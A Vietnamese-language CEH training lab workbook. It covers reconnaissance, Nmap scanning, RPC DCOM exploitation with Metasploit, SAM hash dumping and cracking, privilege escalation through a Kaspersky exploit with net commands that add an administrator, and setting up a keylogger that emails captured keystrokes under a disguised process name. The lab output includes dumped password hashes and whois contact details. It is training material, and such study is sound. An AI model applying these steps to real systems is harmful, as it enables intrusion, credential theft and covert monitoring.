CEH Lab Book Tieng Viet Phan1

Gio trnh bi tp C|EH
Ti liu dnh cho hc vin
Mc Lc
Bi 1:..................................................................................................................................... 3
FOOTPRINTING ................................................................................................................ 3
I/ Gii thiu v Foot Print:............................................................................................... 3
II/ Cc bi thc hnh: ...................................................................................................... 3
Bi 1: Tm thng tin v Domain................................................................................... 3
Bi 2: Tm thng tin email ........................................................................................... 5
Bi 2:..................................................................................................................................... 7
SCANNING.......................................................................................................................... 7
I/ Gii thiu v Scanning: ............................................................................................... 7
II/ Cc Bi thc hnh....................................................................................................... 7
Bi thc hnh 1: S dng Phn mm Nmap.................................................................. 7
Bi thc hnh th 2: S dng phn mm Retina pht hin cc vulnerabilities v tn
cng bng Metaesploit framework................................................................................ 13
Bi 3:................................................................................................................................... 18
SYSTEM HACKING......................................................................................................... 18
I/ Gii thiu System Hacking:....................................................................................... 18
II/ Thc hnh cc bi Lab ............................................................................................. 18
Bi 1: Crack password nt b ni b........................................................................ 18
Bi 2: S dng chng trnh pwdump3v2 khi c c 1 user administrator ca
my nn nhn c th tm c thng tin cc user cn li. ................................... 20
Bi Lab 3: Nng quyn thng qua chng trnh Kaspersky Lab ............................ 23
Bi Lab 4: S dng Keylogger................................................................................... 25
Bi Lab 5: S dng Rootkit v xa Log file .............................................................. 27
Bi 4:................................................................................................................................... 30
TROJAN v BACKDOOR ................................................................................................ 30
I/ Gii thiu v Trojan v Backdoor: ........................................................................... 30
II/ Cc bi thc hnh: .................................................................................................... 30
Bi 1 S dng netcat: ................................................................................................. 30
Bi 2: S dng Trojan Beast v detect trojan........................................................... 32
Mun s dng Trojan Beast, ta cn phi xy dng 1 file Server ci ln my nn nhn, sau
file server ny s lng nghe nhng port c nh v t my tn cng ta s connect
vo my nn nhn thng qua cng ny. ........................................................................ 32
Bi 3: S dng Trojan di dng Webbase .............................................................. 35
Bi 5:................................................................................................................................... 38
CC PHNG PHP SNIFFER ..................................................................................... 38
I/ Gii thiu v Sniffer .................................................................................................. 38
Bi 6:................................................................................................................................... 65
Tn Cng t chi dch v DoS........................................................................................... 65
I/ Gii thiu: .................................................................................................................. 65
II/ M t bi lab: ............................................................................................................ 67
Bi Lab 1: DoS bng cch s dng Ping of death. ................................................... 67
Bi lab 2: DoS 1 giao thc khng s dng chng thc(trong bi s dng giao thc
RIP)............................................................................................................................. 69
Bi Lab 3: S dng flash DDoS ............................................................................ 72
Bi 7:................................................................................................................................... 74
Social Engineering ............................................................................................................. 74
I/ Gii Thiu .................................................................................................................. 74
VSIC Education Corporation
Trang 1
Gio trnh bi tp C|EH
II/ Cc bi Lab: .............................................................................................................. 74

Bi Lab 1: Gi email nc nh km Trojan .............................................................. 74
Bi 8:................................................................................................................................... 77
Session Hijacking ............................................................................................................... 77
I/ Gii thiu: ................................................................................................................... 77
II/ Thc hin bi Lab........................................................................................................ 77
Bi 9:................................................................................................................................... 80
Hacking Web Server.......................................................................................................... 80
I/ Gii thiu: ................................................................................................................... 80
II/ Thc Hin bi lab. ....................................................................................................... 80
Bi Lab 1: Tn cng Web Server Win 2003(li Apache).......................................... 80
Bi lab 2: Khai thc li ng dng Server U ............................................................. 84
Bi 10:................................................................................................................................. 85
WEB APPLICATION HACKING.................................................................................... 85
I/ Gii thiu: .................................................................................................................. 85
II/ Cc Bi Lab............................................................................................................... 85
Bi Lab 1: Cross Site Scripting.................................................................................. 85
Bi Lab 2: Insufficient Data Validation .................................................................... 86
Bi Lab 3: Cookie Manipulation ............................................................................... 88
Bi Lab 4: Authorization Failure .............................................................................. 89
Bi 11:................................................................................................................................. 91
SQL INJECTION .............................................................................................................. 91
I/ Gii thiu v SQL Injection: ...................................................................................... 91
II/ Thc Hnh Bi Lab .................................................................................................. 94
Bi 12:............................................................................................................................... 101
WIRELESS HACKING .................................................................................................. 101
I/ Gii Thiu ................................................................................................................. 101
II/ Thc hnh bi Lab: ................................................................................................ 101
Bi 13:............................................................................................................................... 105
VIRUS .............................................................................................................................. 105
I/ Gii thiu: (tham kho bi c thm)..................................................................... 105
II/ Thc hnh Lab: ...................................................................................................... 105
Bi 1: Virus ph hy d liu my ............................................................................ 105
Bi 2: Virus gaixinh ly qua tin nhn...................................................................... 107
Bi 14:............................................................................................................................... 111
BUFFER OVERFLOW ................................................................................................... 111
I/ L thuyt .................................................................................................................. 111
II/ Thc hnh: .............................................................................................................. 118
Trang 2
Gio trnh bi tp C|EH
Bi 1:
FOOTPRINTING
I/ Gii thiu v Foot Print:
y l k thut gip hacker tm kim thng tin v 1 doanh nghip, c nhn hay t
chc. Bn c th iu tra c rt nhiu thng tin ca mc tiu nh vo k thut ny. V d
trong phn thc hnh th 1 chng ta p dng k thut ny tm kim thng tin v mt
domain(v d l www.itvietnam.com) v xem th email lin lc ca domain ny l ca ai,
trong phn thc hnh th 2 chng ta truy tm 1 danh sch cc email ca 1 keywork cho trc,
phng php ny hiu qu cho cc doanh nghip mun s dng marketing thng qua hnh
thc email v.v. Trong giai don ny Hacker c gng tm cng nhiu thng tin v doanh
nghip(thng qua cc knh internet v phone) v c nhn(thng qua email v hot ng ca
c nhn trn Internet), nu thc hin tt bc ny Hacker c th xc nh c nn tn
cng vo im yu no ca chng ta. V d mun tn cng domain www.itvietnam.com th
Hacker phi bit c a ch email no l ch ca domain ny v tm cch ly password ca
email thng qua tn cng mail Server hay sniffer trong mng ni b v.v. V cui cng ly
c Domain ny thng qua email ch ny.
II/ Cc bi thc hnh:
Bi 1: Tm thng tin v Domain
Ta vo trang www.whois.net tm kim thng tin v nh vo domain mnh mun
tm kim thng tin
Sau ta nhn c thng tin nh sau:

Trang 3
Gio trnh bi tp C|EH
Registrar Name....: BlueHost.Com

Registrar Whois...: whois.bluehost.com
Registrar Homepage: http://www.bluehost.com/
Domain Name: ITVIETNAM.COM
Created on..............: 1999-11-23 11:31:30 GMT
Expires on..............: 2009-11-23 00:00:00 GMT
Last modified on........: 2007-07-30 03:15:11 GMT
Registrant Info: (FAST-12836461)
78-80 Nguyen Trai Street,
5 District, HCM City, 70000
Vietnam
Phone: +84.88363691
Fax..:
Email: jkow@itvietnam.com
Last modified: 2007-03-23 04:12:24 GMT
Administrative Info: (FAST-12836461)
78-80 Nguyen Trai Street,
5 District, HCM City, 70000
Vietnam
Phone: +84.88363691
Fax..:
Email: jkow@itvietnam.com
Technical Info: (FAST-12785240)
Attn: itvietnam.com
C/O BlueHost.Com Domain Privacy
1215 North Research Way
Suite #Q 3500
Orem, Utah 84097
United States
Phone: +1.8017659400
Fax..: +1.8017651992
Email: whois@bluehost.com
Trang 4
Gio trnh bi tp C|EH

Status: Locked
Ngoi vic tm thng tin v domain nh trn, chng ta c th s dng cc tin ch
Reverse IP domain lookup c th xem th trn IP ca mnh c bao nhiu host chung vi
mnh. Vo link sau y s dng tin ch ny.
http://www.domaintools.com/reverse-ip/
Vic tm kim c thng tin ny rt cn thit vi Hacker, bi v da vo thng tin s

dng chung Server ny, Hacker c th thng qua cc Website b li trong danh sch trn v
tn cng vo Server t kim sot tt c cc Website c hosting trn Server.
Bi 2: Tm thng tin email
Trong bi thc hnh ny, chng ta s dng phn mm 1st email address spider
tm kim thng tin v cc email. Hacker c th s dng phn mm ny thu thp thm thng
tin v mail, hay lc ra cc i tng email khc nhau, tuy nhin bn c th s dng tool ny
thu thp thm thng tin nhm mc ch marketing, v d bn cn tm thng tin ca cc
email c ui l @vnn.vn hay @hcm.vnn.vn phc cho vic marketing sn phm.
Ta c th cu hnh vic s dng trang web no ly thng tin, trong bi ti s dng
trang google.com tm kim.
Trang 5
Gio trnh bi tp C|EH
Sau nh t kha vnn.vn vo tag keyword
Sau chng ta c c 1 list mail nh s dng trng trnh ny.

Trang 6
Gio trnh bi tp C|EH
Bi 2:
SCANNING
I/ Gii thiu v Scanning:
Scanning hay cn gi l qut mng l bc khng th thiu c trong qu trnh tn
cng vo h thng mng ca hacker. Nu lm bc ny tt Hacker s mau chng pht hin
c li ca h thng v d nh li RPC ca Window hay li trn phm mm dch v web
nh Apache v.v. V t nhng li ny, hacker c th s dng nhng on m c hi(t cc
trang web) tn cng vo h thng, ti t nht ly shell.
Phn mm scanning c rt nhiu loi, gm cc phm mm thng mi nh Retina,
GFI, v cc phn mm min ph nh Nmap,Nessus. Thng thng cc n bn thng mi c
th update cc bug li mi t internet v c th d tm c nhng li mi hn. Cc phn
mm scanning c th gip ngi qun tr tm c li ca h thng, ng thi a ra cc gii
php sa li nh update Service patch hay s dng cc policy hp l hn.
II/ Cc Bi thc hnh
Bi thc hnh 1: S dng Phn mm Nmap
Trc khi thc hnh bi ny, hc vin nn tham kho li gio trnh l thuyt v cc
option ca nmap.
Chng ta c th s dng phn mm trong CD CEH v5, hay c th download bn mi
nht t website: www.insecure.org. Phn mm nmap c 2 phin bn dnh cho Win v dnh
cho Linux, trong bi thc hnh v Nmap, chng ta s dng bn dnh cho Window.
thc hnh bi ny, hc vin nn s dng Vmware v boot t nhiu h iu hnh
khc nhau nh Win XP sp2, Win 2003 sp1, Linux Fedora Core, Win 2000 sp4,v.v.
Trc tin s dng Nmap do thm th xem trong subnet c host no up v cc port
cc host ny m, ta s dng lnh Nmap h xem li cc option ca Nmap, sau thc hin
lnh Nmap sS 10.100.100.1-20. V sau c kt qu sau:
C:\Documents and Settings\anhhao>nmap -sS 10.100.100.1-20
Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:27 Pacific Standard
Time
Interesting ports on 10.100.100.1:
Not shown: 1695 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:09:ED:10 (VMware)
PORT STATE SERVICE
Trang 7
Gio trnh bi tp C|EH
7/tcp open echo

9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
23/tcp open telnet
42/tcp open nameserver
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
2105/tcp open eklogin
3389/tcp open ms-term-serv
8080/tcp open http-proxy
MAC Address: 00:0C:29:59:97:A2 (VMware)
PORT STATE SERVICE
135/tcp open msrpc
MAC Address: 00:0C:29:95:A9:03 (VMware)
Not shown: 1695 filtered ports
PORT STATE SERVICE
MAC Address: 00:0C:29:A6:2E:31 (VMware)
Skipping SYN Stealth Scan against 10.100.100.13 because Windows does not support
scanning your own machine (localhost) this way.
All 0 scanned ports on 10.100.100.13 are
Trang 8
Gio trnh bi tp C|EH

PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
443/tcp open https
1433/tcp open ms-sql-s
MAC Address: 00:0C:29:D6:73:6D (VMware)
PORT STATE SERVICE
135/tcp open msrpc
1000/tcp open cadlock
5101/tcp open admdog
MAC Address: 00:15:C5:65:E3:85 (Dell)
Nmap finished: 20 IP addresses (7 hosts up) scanned in 21.515 seconds
Trong mng c tt c 7 host, 6 my Vmware v 1 PC DELL. By gi bc tip theo ta
tm kim thng tin v OS ca cc Host trn bng s dng lnh Nmap v -O ip address .
C:\Documents and Settings\anhhao>nmap -vv -O 10.100.100.7 (xem chi tit Nmap qut)
Time
Initiating ARP Ping Scan at 10:46
Scanning 10.100.100.7 [1 port]
Completed ARP Ping Scan at 10:46, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:46
Completed Parallel DNS resolution of 1 host. at 10:46, 0.01s elapsed
Initiating SYN Stealth Scan at 10:46
Scanning 10.100.100.7 [1697 ports]
Discovered open port 1025/tcp on 10.100.100.7
Trang 9
Gio trnh bi tp C|EH
Completed SYN Stealth Scan at 10:46, 1.56s elapsed (1697 total ports)
Initiating OS detection (try #1) against 10.100.100.7
Host 10.100.100.7 appears to be up ... good.
PORT STATE SERVICE
135/tcp open msrpc
MAC Address: 00:0C:29:95:A9:03 (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS details: Microsoft Windows 2003 Server SP1
OS Fingerprint:
OS:SCAN(V=4.20%D=8/2%OT=135%CT=1%CU=36092%PV=Y%DS=1%G=Y%M=000C
29%TM=46B2187
OS:3%P=i686-pc-windowswindows)SEQ(SP=FF%GCD=1%ISR=10A%TI=I%II=I%SS=S%TS=0)
OS:OPS(O1=M5B4NW0NNT00NNS%O2=M5B4NW0NNT00NNS%O3=M5B4NW0NNT0
0%O4=M5B4NW0NNT0
OS:0NNS%O5=M5B4NW0NNT00NNS%O6=M5B4NNT00NNS)WIN(W1=FAF0%W2=F
AF0%W3=FAF0%W4=F
OS:AF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=N%T=80%W=FAF0%O=M5B4NW0NN
S%CC=N%Q=)T1(R=Y
OS:%DF=N%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=
Z%A=S%F=AR%O=%RD
OS:=0%Q=)T3(R=Y%DF=N%T=80%W=FAF0%S=O%A=S+%F=AS%O=M5B4NW0NNT
00NNS%RD=0%Q=)T4
OS:(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T
=80%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=
0%Q=)T7(R=Y%DF=N%
OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%TOS=0
%IPL=B0%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUL=G%RUD=G)IE(R=Y%DFI=S%T=80%T
OSI=Z%CD=Z%SI=S%
OS:DLI=S)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IPID Sequence Generation: Incremental
Trang 10
Gio trnh bi tp C|EH
OS detection performed. Please report any incorrect results at http://insecure.o

rg/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 3.204 seconds
Raw packets sent: 1767 (78.460KB) | Rcvd: 1714 (79.328KB)
Ta c th xem cc figerprinting ti C:\Program Files\Nmap\nmap-os-fingerprints
Tip tc vi nhng my cn li.

C:\Documents and Settings\anhhao>nmap -O 10.100.100.1
Time
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:09:ED:10 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.12 (x86)
Uptime: 0.056 days (since Thu Aug 02 09:34:08 2007)
Trang 11
Gio trnh bi tp C|EH

rg/nmap/submit/ .
Tuy nhin c 1 s host Nmap khng th nhn din ra nh sau:
C:\Documents and Settings\anhhao>nmap -O 10.100.100.16
Time
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
443/tcp open https
1433/tcp open ms-sql-s
No exact OS matches for host (If you know what OS is running on it, see http://i
nsecure.org/nmap/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=4.20%D=8/2%OT=21%CT=1%CU=35147%PV=Y%DS=1%G=Y%M=000C2
9%TM=46B21A94
OS:%P=i686-pc-windowswindows)SEQ(SP=FD%GCD=2%ISR=10C%TI=I%II=I%SS=S%TS=0)S
OS:EQ(SP=FD%GCD=1%ISR=10C%TI=I%II=I%SS=S%TS=0)OPS(O1=M5B4NW0NNT0
0NNS%O2=M5B
OS:4NW0NNT00NNS%O3=M5B4NW0NNT00%O4=M5B4NW0NNT00NNS%O5=M5B4
NW0NNT00NNS%O6=M5
OS:B4NNT00NNS)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0%W6
=FAF0)ECN(R=Y%D
OS:F=Y%T=80%W=FAF0%O=M5B4NW0NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=
O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%
DF=Y%T=80%W=FAF0
OS:%S=O%A=S+%F=AS%O=M5B4NW0NNT00NNS%RD=0%Q=)T4(R=Y%DF=N%T=8
0%W=0%S=A%A=O%F=
Trang 12
Gio trnh bi tp C|EH
OS:R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0
%Q=)T6(R=Y%DF=N%T
OS:=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=80%W=0%S=Z
%A=S+%F=AR%O=%RD=
OS:0%Q=)U1(R=Y%DF=N%T=80%TOS=0%IPL=38%UN=0%RIPL=G%RID=G%RIPCK
=G%RUCK=G%RUL=
OS:G%RUD=G)IE(R=Y%DFI=S%T=80%TOSI=S%CD=Z%SI=S%DLI=S)

rg/nmap/submit/ .
Tuy nhin ta c th nhn din rng y l 1 Server chy dch v SQL v Web Server,
by gi ta s dng lnh Nmap v p 80 sV 10.100.100.16 xc nh version ca IIS.
C:\Documents and Settings\anhhao>nmap -p 80 -sV 10.100.100.16
Time
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS webserver 5.0
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://insec
ure.org/nmap/submit/ .
Vy ta c th on c phn nhiu host l Window 2000 Server. Ngoi vic thc
hnh trn chng ta c th s dng Nmap trace, lu log v.v
Bi thc hnh th 2: S dng phn mm Retina pht hin cc vulnerabilities v tn cng
bng Metaesploit framework.
Retina ca Ieye l phn mm thng mi(cng nh GFI, shadow v.v ) c th update
cc l hng 1 cch thng xuyn v gip cho ngi Admin h thng c th a ra nhng gii
php x l.
By gi ta s dng phn mm Retina d tm li ca my Win 2003
Sp0(10.100.100.6)
Trang 13
Gio trnh bi tp C|EH
Report t chng trnh Retina:

TOP 20 VULNERABILITIES
The following is an overview of the top 20 vulnerabilities on your network.
Rank
Vulnerability Name
Count
1.
echo service
2.
ASN.1 Vulnerability Could Allow Code Execution
3.
Windows Cumulative Patch 835732 Remote
4.
Null Session
5.
No Remote Registry Access Available
6.
telnet service
7.
DCOM Enabled
8.
Windows RPC Cumulative Patch 828741 Remote
9.
Windows RPC DCOM interface buffer overflow
10.
Windows RPC DCOM multiple vulnerabilities
11.
Apache 1.3.27 0x1A Character Logging DoS
Trang 14
Gio trnh bi tp C|EH
12.
Apache 1.3.27 HTDigest Command Execution
13.
Apache mod_alias and mod_rewrite Buffer Overflow
14.
ApacheBench multiple buffer overflows
15.
HTTP TRACE method supported
TOP 20 OPEN PORTS

The following is an overview of the top 20 open ports on your network.
Rank
Port Number Description
Count
1.
TCP:7
ECHO - Echo
2.
TCP:9
DISCARD - Discard
3.
TCP:13
DAYTIME - Daytime
4.
TCP:17
QOTD - Quote of the Day
5.
TCP:19
CHARGEN - Character Generator
6.
TCP:23
TELNET - Telnet
7.
TCP:42
NAMESERVER / WINS - Host Name Server
8.
TCP:53
DOMAIN - Domain Name Server
9.
TCP:80
WWW-HTTP - World Wide Web HTTP (Hyper Text

Transfer Protocol)
10.
TCP:135
RPC-LOCATOR - RPC (Remote Procedure Call) Location

1
Service
11.
TCP:139
NETBIOS-SSN - NETBIOS Session Service
12.
TCP:445
MICROSOFT-DS - Microsoft-DS
13.
TCP:1025
LISTEN - listen
14.
TCP:1026
NTERM - nterm
15.
TCP:1030
IAD1 - BBN IAD
16.
TCP:2103
ZEPHYR-CLT - Zephyr Serv-HM Conncetion
17.
TCP:2105
EKLOGIN - Kerberos (v4) Encrypted RLogin
18.
TCP:3389
MS RDP (Remote Desktop Protocol) / Terminal Services
19.
TCP:8080
Generic - Shared service port
20.
UDP:7
ECHO - Echo
TOP 20 OPERATING SYSTEMS

The following is an overview of the top 20 operating systems on your network.
Trang 15
Gio trnh bi tp C|EH
Rank
Operating System Name
Count
1.
Windows Server 2003
Nh vy ta xc nh h iu hnh ca my 10.100.100.6, cc Port m ca h thng

v cc li ca h thng. y l thng tin cn thit ngi Admin nhn din li v v li
Trong Top 20 vulnerabilities ta s khai thc bug li th 10 l RPC DCOM bng chng trinh
Metaesploit framework(CD CEH v5). Ta c th kim tra cc thng tin li ny trn chnh trang
ca Ieye hay securityfocus.com, microsoft.com.
Ta s dng giao din console ca Metaesploit tm bug li hp vi chng trnh
Retina va qut c.
Trang 16
Gio trnh bi tp C|EH
Ta thy c th nhn thy bug li msrpc_dcom_ms03_026.pm c lit k trong phn

exploit ca metaesploit. By gi ta bt u khai thc li ny.
Nh vy sau khi khai thc ta c c shell ca my Win 2003, by gi ta c th

upload backdoor hay ly nhng thng tin cn thit trong my ny(vn ny s c bn
nhng chng sau).
Kt lun: Phn mm scanning rt quan trng vi Hacker c th pht hin li ca h thng,
sau khi xc nh li Hacker c th s dng Framework c sn hay code c sn trn Internet
c th chim quyn s dng ca my mc tiu. Tuy nhin y cng l cng c hu ch ca
Admin h thng, phn mm ny gip cho ngi Admin h thng nh gi li mc bo mt
ca h thng mnh v kim tra lin tc cc bug li xy ra.
Trang 17
Gio trnh bi tp C|EH
Bi 3:
SYSTEM HACKING
I/ Gii thiu System Hacking:
Nh chng ta hc phn l thuyt, Module System Hacking bao gm nhng k
thut ly Username v Password, nng quyn trong h thng, s dng keyloger ly thng
tin ca i phng(trong bc ny cng c th Hacker li Trojan, vn hc chng
tip theo), n thng tin ca process ang hot ng(Rootkit), v xa nhng log h thng.
i vi phn ly thng tin v username v password Local, hacker c th crack pass
trn my ni b nu s dng phn mm ci ln my , hay s dng CD boot Knoppix ly
syskey, bc tip theo l gii m SAM ly hash ca Account h thng. Chng ta c th ly
username v password thng qua remote nh SMB, NTLM(bng k thut sniffer s hc
chng sau) hay thng qua 1 Account ca h thng bit(s dng PWdump3)
Vi phn nng quyn trong h thng, Hacker c th s dng l hng ca Window, cc
phn mm chy trn h thng nhm ly quyn Admin iu khin h thng. Trong bi thc
hnh ta khai thc l hng ca Kaberky Lab 6.0 nng quyn t user bnh thng sang user
Administrator trong Win XP sp2.
Phn Keylogger ta s dng SC-keyloger xem cc hot ng ca nn nhn nh gim
st ni dung bn phm, thng tin v chat, thng tin v s dng my, thng tin v cc ti khon
user s dng.
Tip theo ta s dng Rootkit n cc process ca keyloger, lm cho ngi admin h
thng khng th pht hin ra l mnh ang b theo di. bc ny ta s dng vanquis rootkit
n cc process trong h thng. Cui cng ta xa log v du vt xm nhp h thng.
II/ Thc hnh cc bi Lab
Bi 1: Crack password nt b ni b
Trang 18
Gio trnh bi tp C|EH
Trc tin ta ci phm mm Cain vo my i phng, v s dng phn mm ny

d tm password ca user.
Qu trnh Add user
Bt phm mm Cain v chn Import Hashes from local system
y chng ta thy c 3 ch , Import hash from local system, ta s dng file

SAM ca h thng hin ti ly hash ca account(khng c m ha syskey), Option Import
Hashes from text file, thng thng text file ny l ly t Pwdump(lu hash ca account h
thng di dng khng b m ha), Option th 3 l khi chng ta c syskey v file SAM b m
ha bi syskey. Ca ba trng hp nu nhp y thng tin chng ta u c th c hash ca
account khng b m ha bi syskey. Da vo thng tin hash ny phn mm s brute force
tm kim password ca account.
Trong bi ta chn user haovsic, v chn Brute force theo NTLM hash. Sau khi chn
ch ny ta thy PC bt u tnh ton v cho ra kt qu.
Trang 19
Gio trnh bi tp C|EH
Bi 2: S dng chng trnh pwdump3v2 khi c c 1 user administrator ca

my nn nhn c th tm c thng tin cc user cn li.
Trang 20
Gio trnh bi tp C|EH
My ca nn nhn s dng Window 2003 sp0, v c sn user quyen password l

cisco, by gi da vo account ny, ta c th tm thm thng tin ca nhng account khc
trong my.
Trc tin ta s dng pwdump3.exe xem cc tham s cn nhp vo. Sau s
dng lnh pwdump3.exe 10.100.100.6 c;\hao2003sp0 quyen, v nhp vo password ca
user quyen.
Ta m file hao2003sp0 xem trong thng tin.

aaa:1015:NO PASSWORD*********************:NO
PASSWORD*********************:::
anhhao:1010:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782
BBD9D5E18:::
anhhao1:1011:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782
BBD9D5E18:::
anhhao2:1013:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782
BBD9D5E18:::
anhhaoceh:1019:B26C623F5254C6A311F64391B17C6CDE:98A2C048C77703D54BD0E88
887EFD68E:::
ASPNET:1006:7CACBCC121AC203CD8652FE65BEA4486:7D34A6E7504DFAF453D421
3660AE7D35:::
Guest:501:NO PASSWORD*********************:NO
PASSWORD*********************:::
hack:1022:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12
283678:::
hacker:1018:BCE739534EA4E445AAD3B435B51404EE:5E7599F673DF11D5C5C4D950F
5BF0157:::
hao123:1020:58F907D1C79C344DAAD3B435B51404EE:FD03071D41308B58B9DDBC6D
5576D78D:::
Trang 21
Gio trnh bi tp C|EH
haoceh:1016:B3FF8763A6B5CE26AAD3B435B51404EE:7AD94985F28454259BF2A03821
FEC8DB:::
hicehclass:1023:B2BEF1B1582C2DC0AAD3B435B51404EE:D6198C25F8420A93301A579
2398CF94C:::
IUSR_113SSR3JKXGW3N:1003:449913C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F483
3ABFA52ADA9462:::
IWAM_113SSR3JKXGW3N:1004:4431005ABF401D86F92DBAC26FDFD3B8:188AA6E0737F12D16
D60F8B64F7AE1FA:::
lylam:1012:EE94DC327C009996AAD3B435B51404EE:7A63FB0793A85C960A775497C9
D738EE:::
quyen:500:A00B9194BEDB81FEAAD3B435B51404EE:5C800F13A3CE86ED2540DD4E
7331E9A2:::
SUPPORT_388945a0:1001:NO
PASSWORD*********************:F791B19C488F4260723561D4F484EA09:::
tam:1014:NO PASSWORD*********************:NO
PASSWORD*********************:::
test:1017:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B8
9537:::
vic123:1021:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB
12283678:::
Ta thy thng tin user quyen c ID l 500, y l ID ca user administrator trong
mng, v user Guest l 501. Ngoi thng tin trn, ta c thm thng tin v pash hash ca user,
by gi ta s dng chng trnh Cain tm kim thng tin v password ca cc user khc.
S dng Brute Force Attack vi user hiclassceh v tm ra password l 1234a.

Password ny ch c 5 k t v d dng b Brute Force, tuy nhin i vi nhng password l
Trang 22
Gio trnh bi tp C|EH
stong password (password bao gm ch hoa v thng, k t, s, k t c bit) th s lu

hn.
Bi Lab 3: Nng quyn thng qua chng trnh Kaspersky Lab
i vi vic nng quyn trong mt h thng hacker phi li dng l hng no ,
hoc l t h iu hnh, hoc l t nhng phn mm ca hng th 3, trong trng hp ny,
chng ta nng quyn thng qua phn mm dit Virus l Kaspersky Lab. chun b bi lab
ny, chng ta ln trang web www.milw0rm.com tm thng tin v on m khai thc ny.
Sau ta s dng on code ny bin dch thy file exe tn cng vo my nn

nhn. thc hnh bi Lab, ta cn phi ci phn mm Kaspersky vo my. Sau khi ci xong
ta thm vo my 1 user bnh thng,v tin hnh log on vo user ny, Trong bi ta s dng
user hao v password l hao.
Trang 23
Gio trnh bi tp C|EH
Chy file exe c bin dch exploit vo Kaspersky ang chy di quyn
admin h thng.
S dng lnh telnet 127.0.0.1 8080 truy xut vo shell c quyn admin h
thng. Ta tip tc s dng lnh Net Localgroup administrators hao /add add user hao
vo nhm admin, v s dng lnh net user ti xc nhn
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\WINDOWS\system32>
D:\WINDOWS\system32>net Localgroup administrators hao /add
net Localgroup administrators hao /add
The command completed successfully.
D:\WINDOWS\system32>net user hao

net user hao
User name
hao
Full Name
Comment
User's comment
Country code
000 (System Default)
Account active
Yes
Account expires
Never
Password last set
Password expires
Password changeable
Password required
8/3/2007 1:47 PM
9/15/2007 12:35 PM
8/3/2007 1:47 PM
Yes
Trang 24
Gio trnh bi tp C|EH
User may change password
Yes
Workstations allowed
All
Logon script
User profile
Home directory
Last logon
8/3/2007 1:54 PM
Logon hours allowed
All
Local Group Memberships

*Administrators
Global Group memberships *None
The command completed successfully.
*Users
D:\WINDOWS\system32>
Ta thy user hao by gi c quyn Admin trong h thng, v vic nng quyn
thnh cng. Cc bn c th test nhng phn mm tng t t code down t trang
www.milw0rm.com.
Bi Lab 4: S dng Keylogger
Trong bi lab ny, ta s dng phn mm SC Keylogger thu thp thng tin t my
ca nn nhn, vic phi lm phi to ra file keylog, chn mail server relay, ci vo nn nhn.
Sau khi ci phn mm ti file keylogger, by gi ta bt u cu hnh cho sn phm
keylogger ca mnh. u tin ta chn hnh ng c ghi log file bao gm ghi keyboard,
Mouse, v chng trnh chy.
Trang 25
Gio trnh bi tp C|EH
Tip theo ta chn thng tin email m my nn nhn s gi logfile ny. Thng tin ny
c gi 10 pht 1 ln.
Tip theo ta cu hnh mail server relay, v thng tin v process hin th, phn ny
hacker thng thng s dng nhng tn ging vi nhng service c sn trn Window nh
svchost.exe,csrss.exev.v nh la ngi admin. d nhn dng ta chn tn file l
cehkeylogger.
Sau khi to xong keylogger, ta chy n trn my nn nhn. Ta chn 1 my Win XP

no chy chng trnh ny v gi s sau nh on text sau:
Trang 26
Gio trnh bi tp C|EH
i khong 10 pht ta s thy logfile c gi v nh sau:
>> C:\WINDOWS\system32\notepad.exe
<< 05-08-07 11:39:23 Untitled - Notepad
>> Chuc lop
Sec<BS><BS><BS>CEH manh khoe, va nhieu thanh dat..
>> Chuc lop CEH hoc gioi
>>::::::::::<PRNTSCR><ALT>
<< 05-08-07 11:39:56 Run
>> <WIN-START>ms<DOWN>
<< 05-08-07 11:39:59 Process started
>>
C:\WINDOWS\system32\mspaint.exe
Theo nh trn, chng ta c th thy keyloger c th lu li hu nh ht tt c thng tin

